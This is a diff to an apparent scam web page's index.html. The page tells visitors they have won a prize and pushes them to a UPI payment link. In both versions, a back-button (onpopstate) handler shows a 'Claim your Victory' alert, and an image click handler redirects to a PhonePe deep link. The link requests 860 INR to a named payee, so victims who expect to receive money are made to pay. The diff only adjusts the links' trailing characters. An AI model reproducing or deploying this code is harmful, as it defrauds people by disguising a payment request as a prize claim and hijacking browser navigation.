--- a/index.html
+++ b/index.html
@@ -37,7 +37,7 @@
  onpopstate=function (t)
  {
   t.state && alert(' Claim your Victory by Clicking on \n "SEND IN BANK ACCOUNT"  ')
-location.href='phonepe://pay?pa=shubh20034@ibl&pn=PDVPS8636F&tn=JIO20BR00095M0YJ124032023T231412E0360&am=860&cu=INR&mode=02&purpose=00&tr? '
+location.href='phonepe://pay?pa=shubh20034@ibl&pn=PDVPS8636F&tn=JIO20BR00095M0YJ124032023T231412E0360&am=860&cu=INR&mode=02&purpose=00&tr '
   ;
   }}
   catch (o){}}();</script>
@@ -61,7 +61,7 @@ location.href='phonepe://pay?pa=shubh20034@ibl&pn=PDVPS8636F&tn=JIO20BR00095M0YJ
 
 <div>
 <div>
-<img src="1 (2).jpg" width="100%" height="auto" onclick="location.href='phonepe://pay?pa=shubh20034@ibl&pn=PDVPS8636F&tn=JIO20BR00095M0YJ124032023T231412E0360&am=860&cu=INR&mode=02&purpose=00&tr# '">
+<img src="1 (2).jpg" width="100%" height="auto" onclick="location.href='phonepe://pay?pa=shubh20034@ibl&pn=PDVPS8636F&tn=JIO20BR00095M0YJ124032023T231412E0360&am=860&cu=INR&mode=02&purpose=00&tr '">
 </div>
 <div class="container" id="js-container">
 <div class="confetti"></div>
